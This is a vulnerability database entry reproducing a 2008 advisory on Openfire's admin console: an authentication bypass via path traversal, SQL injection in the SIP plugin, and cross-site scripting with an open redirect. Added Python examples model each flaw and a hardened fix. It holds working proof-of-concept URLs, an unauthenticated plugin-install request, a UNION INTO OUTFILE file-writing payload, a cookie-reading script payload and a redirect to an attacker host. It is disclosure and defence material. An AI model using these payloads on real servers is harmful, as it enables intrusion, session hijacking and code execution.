Igniterealtime Openfire Admin Console Directory Traversal Vulnerability

Vulnerability ID: 1116701
Vulnerability type: Path traversal
Published: 2008-11-09
Updated: 2009-03-26
CVE: CVE-2008-6508
CNNVD ID: CNNVD-200903-364
Platform: JSP
CVSS score: 7.5
|Sources
https://www.exploit-db.com/exploits/7075
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-364
|Vulnerability details
Openfire (formerly Wildfire) is IgniteRealtime's cross-platform open-source real-time collaboration (RTC) server. It is written in Java, built on XMPP (formerly Jabber, the instant messaging protocol), can be used to build an efficient instant messaging server and supports tens of thousands of concurrent users. Authentication to the Openfire admin interface is enforced by the servlet filter org.jivesoftware.admin.AuthCheckFilter in the embedded web container, which ensures that only authenticated users can reach the admin interface; all other requests are redirected to the login page. A flaw in Openfire allows internal functions to be accessed without admin credentials. The deployment descriptor (web.xml) configures a number of exclude values for AuthCheckFilter (login.jsp, index.jsp?logout=true, setup/index.jsp, setup/setup-, .gif, .png, error-serverdown.jsp). If the request URL contains any of these exclude strings, the check is bypassed.
|Exploit
Advisory:               Openfire Server Multiple Vulnerabilities
Advisory ID:            AKADV2008-001
Release Date:           2008/11/07
Revision:               1.0
Last Modified:          2008/11/07
Date Reported:          2008/05/17
Author:                 Andreas Kurtz (mail at andreas-kurtz.de)
Affected Software:      Openfire Server <= 3.6.0a
Remotely Exploitable:   Yes
Risk:                   Critical (x) High ( ) Medium ( ) Low ( )
Vendor URL:             http://www.igniterealtime.org
                        http://www.jivesoftware.com/
Vendor Status:          No patch released yet.
Patch development time: N/A


Vulnerability description:
--------------------------

The Jabber server Openfire (<= version 3.6.0a) contains several serious
vulnerabilities. Depending on the particular runtime environment these
issues can potentially even be used by an attacker to execute code
at the operating system level.

1) Authentication bypass
This vulnerability gives an attacker full access to all functions
of the admin web interface without providing any user credentials.
The servlet filter responsible for authentication can be
completely circumvented.

2) SQL injection
It is possible to pass SQL statements to the backend database through
a SQL injection vulnerability. Depending on the particular
runtime environment and database permissions it is even possible to
write files to disk and execute code at the operating system level.

3) Multiple Cross-Site Scripting
Permits arbitrary insertion of HTML and JavaScript code in login.jsp.
An attacker can also manipulate a parameter to specify
a destination to which a user is forwarded after successful
authentication.


Technical details:
------------------

1) Authentication bypass
Authentication to the Openfire admin interface is enforced by a servlet
filter in the embedded web container (org.jivesoftware.admin.AuthCheckFilter).
This filter guarantees that access to the admin interface is only granted
to authenticated users; everybody else is redirected to the login page.

A design error in Openfire enables access to internal functions
without the need for admin user credentials.
The deployment descriptor (web.xml) configures some exclude values
for the AuthCheckFilter:

<filter>   
  <filter-name>AuthCheck</filter-name>
  <filter-class>org.jivesoftware.admin.AuthCheckFilter</filter-class>
  <init-param>
    <param-name>excludes</param-name>       
    <param-value>login.jsp,index.jsp?logout=true,setup/index.jsp,
            setup/setup-,.gif,.png,error-serverdown.jsp</param-value>
  </init-param>
</filter>

When a request URL contains one of these exclude strings the
auth check is skipped entirely. This was considered necessary for
the initial setup process and for the presence plugin. The match is a
plain substring test on the raw request URL, which is never normalised:
an attacker places an exclude string in a path segment and follows it
with ../ segments, so the filter sees setup/setup- and lets the request
through, while the container resolves the ../ segments and serves the
protected page. The following PoC demonstrates how an attacker reaches
internal functions by manipulating the URL to include one of these
excludes (/setup/setup-/../../):

http://www.foo.bar:9090/setup/setup-/../../log.jsp?log=info&mode=asc&lines=All
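To make the mechanism concrete, the following is an added example in Python (not Openfire's Java and not the project's own code). It models the check the advisory describes, where the filter is skipped whenever the raw request URL contains an exclude string, next to a hardened check that canonicalises the path the way the container does before dispatching and then gives each exclude the meaning its spelling implies. The exclude list is the one from the web.xml above; the assumption that the matched string is the path plus query string relative to the admin context (which the index.jsp?logout=true entry suggests), the function names and the matching rules of the hardened variant are assumptions made for this example.

```python
import posixpath
from urllib.parse import unquote

# The exclude list configured for AuthCheckFilter in the web.xml quoted above.
EXCLUDES = [
    "login.jsp",
    "index.jsp?logout=true",
    "setup/index.jsp",
    "setup/setup-",
    ".gif",
    ".png",
    "error-serverdown.jsp",
]


def is_excluded_vulnerable(request_url):
    """Model of the check the advisory describes (assumption: the string tested is
    path plus query string, relative to the admin context). The filter is skipped as
    soon as any exclude appears anywhere in the raw URL; '..' segments are never
    resolved, so a URL the container dispatches to log.jsp still 'contains'
    setup/setup-, and a query string containing login.jsp passes too."""
    return any(exclude in request_url for exclude in EXCLUDES)


def canonical_path(request_url):
    """Split off the query string, percent-decode the path exactly once and collapse
    '.' and '..' segments, mirroring what the container does before servlet mapping.
    Decoding only once matters: a double-encoded %252e stays a literal segment,
    which is also how the container would treat it."""
    path, _, query = request_url.partition("?")
    path = unquote(path)
    normalized = posixpath.normpath("/" + path)  # '/setup/setup-/../../log.jsp' -> '/log.jsp'
    return normalized.lstrip("/"), query


def is_excluded_fixed(request_url):
    """Hardened variant (an assumption for this example, not Openfire's own fix):
    match each exclude against the canonical path with the semantics its spelling
    implies, never as a free substring of the raw URL."""
    path, query = canonical_path(request_url)
    for exclude in EXCLUDES:
        if exclude.startswith("."):            # extension excludes: suffix of the path
            if path.endswith(exclude):
                return True
        elif exclude.endswith("-"):            # prefix excludes such as setup/setup-*
            if path.startswith(exclude):
                return True
        elif "?" in exclude:                   # a page plus a required query string
            ex_path, _, ex_query = exclude.partition("?")
            if path == ex_path and query == ex_query:
                return True
        elif path == exclude:                  # plain page: exact match only
            return True
    return False


if __name__ == "__main__":
    poc = "setup/setup-/../../log.jsp?log=info&mode=asc&lines=All"
    print("vulnerable check skips auth:", is_excluded_vulnerable(poc))
    print("hardened check skips auth:  ", is_excluded_fixed(poc))
```

The hardened check has to apply the same decoding and normalisation the container applies for dispatch, and no more; if the filter decoded twice while the container decoded once, the two would again disagree about which page a URL names.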

2) SQL injection
The parameter "type" in sipark-log-summary.jsp is prone to
SQL injection. Untrusted user data enters the application in
sipark-log-summary.jsp (line 163):

    String type = ParamUtils.getParameter(request, "type");

The function getCalls() in org.jivesoftware.openfire.sip.calllog.CallLogDAO
processes this user input (SQLCondition) and constructs a SQL statement:

    String sql = "SELECT * FROM sipPhoneLog";

    sql = SQLCondition != null && !SQLCondition.equals("") ?
          sql + " WHERE " + SQLCondition : sql;

    sql += " ORDER BY datetime DESC";
       
That statement is executed in the method
createScrollablePreparedStatement()
in CallLogDAO (line 411):

    return con.prepareStatement(sql);
    
In that case there is a SQL injection vulnerability present even though
prepared statements are used. This happens because the string sql is
dynamically concatenated *before* it is passed to the prepared statement
object, so the placeholder mechanism never sees the user input as a parameter.
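The following added example, written in Python over SQLite rather than Openfire's Java and MySQL, shows why the prepared statement does not help here: the vulnerable function glues SQLCondition into the SQL text exactly as getCalls() does above, so attacker-controlled text is parsed as SQL, while the parameterised variant sends the value as a bind parameter. The table contents and column names are constructed for the demonstration, and build_condition() is a hypothetical stand-in for how sipark-log-summary.jsp derives SQLCondition from the type parameter, which the advisory does not reproduce. The payload keeps the advisory's shape (close the quote, UNION, comment out the rest) but reads a second table, since SQLite has no INTO OUTFILE.

```python
import sqlite3

# Constructed stand-in for sipPhoneLog plus a second table an attacker would
# like to read. Column names are illustrative, not Openfire's real schema.
SCHEMA = """
CREATE TABLE sipPhoneLog (datetime INTEGER, type TEXT, username TEXT);
INSERT INTO sipPhoneLog VALUES (1, 'received', 'alice');
INSERT INTO sipPhoneLog VALUES (2, 'dialed', 'bob');
CREATE TABLE secretSettings (name TEXT, value TEXT);
INSERT INTO secretSettings VALUES ('passwordKey', 'k3y-m4t3r14l');
"""


def connect():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def build_condition(type_param):
    """Hypothetical translation of ?type= into SQLCondition (the JSP's code is not
    in the advisory): 'all' means no filter, anything else becomes a quoted literal.
    A value such as all'UNION ... therefore takes the quoted-literal path."""
    if type_param is None or type_param == "all":
        return ""
    return "type = '" + type_param + "'"


def get_calls_vulnerable(con, type_param):
    """Mirrors CallLogDAO.getCalls() as quoted above: the condition is concatenated
    into the SQL text first, so the statement handed to the database already
    contains whatever SQL the attacker supplied."""
    SQLCondition = build_condition(type_param)
    sql = "SELECT * FROM sipPhoneLog"
    sql = sql + " WHERE " + SQLCondition if SQLCondition else sql
    sql += " ORDER BY datetime DESC"
    return con.execute(sql).fetchall()  # stands in for con.prepareStatement(sql)


def get_calls_fixed(con, type_param):
    """Parameterised form: the SQL text is fixed at build time and the user value
    is bound to the '?' placeholder, so it can only ever be compared as data."""
    sql = "SELECT * FROM sipPhoneLog"
    params = []
    if type_param is not None and type_param != "all":
        sql += " WHERE type = ?"
        params.append(type_param)
    sql += " ORDER BY datetime DESC"
    return con.execute(sql, params).fetchall()


# Same shape as the advisory's payload: break out of the quote, UNION in a query
# of the attacker's choosing, comment out the trailing ORDER BY.
INJECTION = "all' UNION SELECT 0, name, value FROM secretSettings -- "


if __name__ == "__main__":
    con = connect()
    print("vulnerable:", get_calls_vulnerable(con, INJECTION))  # leaks secretSettings
    print("fixed:     ", get_calls_fixed(con, INJECTION))       # no rows
```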

3) Cross-Site Scripting
The parameter "url" in login.jsp was vulnerable to Cross-Site Scripting
(XSS). This is the only one of the reported issues that was fixed within
the last 6 months.

http://www.foo.bar:9090/login.jsp?url="/><script>alert(document.cookie);</script>
                       
An attacker can also manipulate the parameter to specify a
destination to which a user is forwarded after successful
authentication:

http://www.foo.bar:9090/login.jsp?url=http://www.attacker.com/StealSession

If a user authenticates using that link it is easy for an
attacker to hijack the user's session.

Furthermore the parameter "username" in login.jsp is still vulnerable
to Cross-Site Scripting attacks.
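As an added example in Python (not Openfire's own fix), the block below shows the two controls that close both findings in this section: the post-login target is accepted only when it is a console-relative path, so absolute, protocol-relative and javascript: targets fall back to a fixed page, and any value that login.jsp reflects into markup is escaped for an attribute context. The function names, the fallback page and the character whitelist are assumptions made for this example.

```python
import html
import re
from urllib.parse import urlsplit

# Assumed fallback when the requested target is rejected.
DEFAULT_TARGET = "index.jsp"

# Characters a console-relative target may contain. Deliberately absent: ':' (no
# scheme), '"', '<', '>' (no attribute or tag break-out), '\\' and whitespace.
_RELATIVE_TARGET = re.compile(r"[A-Za-z0-9_./?=&%+-]+")


def safe_login_redirect(url_param):
    """Return url_param only if it can name a page inside the admin console;
    everything else (http://attacker, //attacker, javascript:, markup) is
    replaced by DEFAULT_TARGET instead of being echoed or followed."""
    if not url_param or not _RELATIVE_TARGET.fullmatch(url_param):
        return DEFAULT_TARGET
    parts = urlsplit(url_param)
    # Belt and braces: the whitelist already excludes ':' but a leading '//'
    # would still parse as a network location, which is an open redirect.
    if parts.scheme or parts.netloc or url_param.startswith("//"):
        return DEFAULT_TARGET
    return url_param


def escape_for_attribute(value):
    """Escape a value for use inside a quoted HTML attribute such as the login
    form's hidden 'url' field, so a '"' in it can never close the attribute."""
    return html.escape(value, quote=True)


def hidden_url_field(url_param):
    """Render the validated and escaped target into the login form."""
    target = escape_for_attribute(safe_login_redirect(url_param))
    return '<input type="hidden" name="url" value="%s">' % target


if __name__ == "__main__":
    for candidate in ("user-summary.jsp?page=2",
                      "http://www.attacker.com/StealSession",
                      '"/><script>alert(document.cookie);</script>'):
        print(repr(candidate), "->", hidden_url_field(candidate))
```

Validation and escaping are separate controls: the whitelist decides where the browser is sent after login, the escaping protects the page that reflects the parameter, and the username parameter the advisory mentions needs the same escaping wherever it is echoed.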

    
Putting it all together:
------------------------

Since the SIP plugin is not installed by default, an attacker first needs
to install it using the authentication bypass vulnerability and the
following POST request:

POST http://www.foo.bar:9090/setup/setup-/../../dwr/exec/downloader.installPlugin.dwr HTTP/1.1
Host: www.foo.bar:9090

callCount=1
c0-scriptName=downloader
c0-methodName=installPlugin
c0-id=7931_1210973487852
c0-param0=string:http%3A%2F%2Fwww.igniterealtime.org%2Fprojects%2Fopenfire%2Fplugins%2Fsip.jar
c0-param1=string:661780277
xml=true

After that installation the described SQL injection vulnerability can
be exploited in a single unauthenticated request.
The following proof of concept uses a MySQL database:

http://www.foo.bar:9090/setup/setup-/../../plugins/sip/sipark-log-summary.jsp?type=all'UNION%20SELECT%20'attack-code'%20INTO%20OUTFILE%20'/tmp/attack.sh'%20/*&startDate=Any&endDate=Any&submit=true&get=Search


Solution:
---------

Since the vendor has not released a patch within the last 6 months it is
highly recommended to deactivate access to the entire admin interface.
This can be achieved for example by blocking the corresponding ports
(tcp/9090 & tcp/9091 by default) with a firewall. Administrators can then
reach the admin interface through SSL tunnels.

For more details see: http://www.andreas-kurtz.de/archives/63


History:
--------

  2008/05/17 - Vendor notified using sales@jivesoftware.com
  2008/05/18 - Vendor notified using gaston@jivesoftware.com
  2008/05/20 - Vendor response
  2008/05/20 - Detailed vulnerability information sent to the vendor
  2008/05/21 - Vendor confirms the vulnerability
  2008/08/18 - Asked vendor for up to date information regarding the reported issues
  2008/10/18 - Again asked vendor for up to date information regarding the reported issues
  2008/10/31 - Informed vendor of planned advisory release on 2008/11/05 (no response)
  2008/11/07 - Full technical details and recommended measures released to general public
       

Credits:
--------

  Vulnerability found and advisory written by Andreas Kurtz.


References:
-----------

  http://www.andreas-kurtz.de/archives/63


Changes:
--------

  Revision 0.1 - Initial draft release to the vendor
  Revision 1.0 - Final version released to general public


Disclaimer:
-----------

The information within this advisory may change without notice. Use
of this information constitutes acceptance for use in an AS IS
condition. There are no warranties, implied or express, with regard
to this information. In no event shall the author be liable for any
direct or indirect damages whatsoever arising out of or in connection
with the use or spread of this information. Any use of this
information is at the user's own risk.

# milw0rm.com [2008-11-09]
|References

Source: www.igniterealtime.org
Link: http://www.igniterealtime.org/issues/browse/JM-1489
Source: www.igniterealtime.org
Link: http://www.igniterealtime.org/builds/openfire/docs/latest/changelog.html
Source: XF
Name: openfire-authcheckfilter-security-bypass(46488)
Link: http://xforce.iss.net/xforce/xfdb/46488
Source: VUPEN
Name: ADV-2008-3061
Link: http://www.vupen.com/english/advisories/2008/3061
Source: BID
Name: 32189
Link: http://www.securityfocus.com/bid/32189
Source: BUGTRAQ
Name: 20081108 [AK-ADV2008-001] Openfire Jabber-Server: Multiple Vulnerabilities (Authentication Bypass, SQL injection, ...)
Link: http://www.securityfocus.com/archive/1/archive/1/498162/100/0/threaded
Source: MILW0RM
Name: 7075
Link: http://www.milw0rm.com/exploits/7075
Source: MISC
Link: http://www.andreas-kurtz.de/archives/63
Source: MISC
Link: http://www.andreas-kurtz.de/advisories/AKADV2008-001-v1.0.txt
Source: SECUNIA
Name: 32478
Link: http://secunia.com/advisories/32478
Source: OSVDB
Name: 49663
Link: http://osvdb.org/49663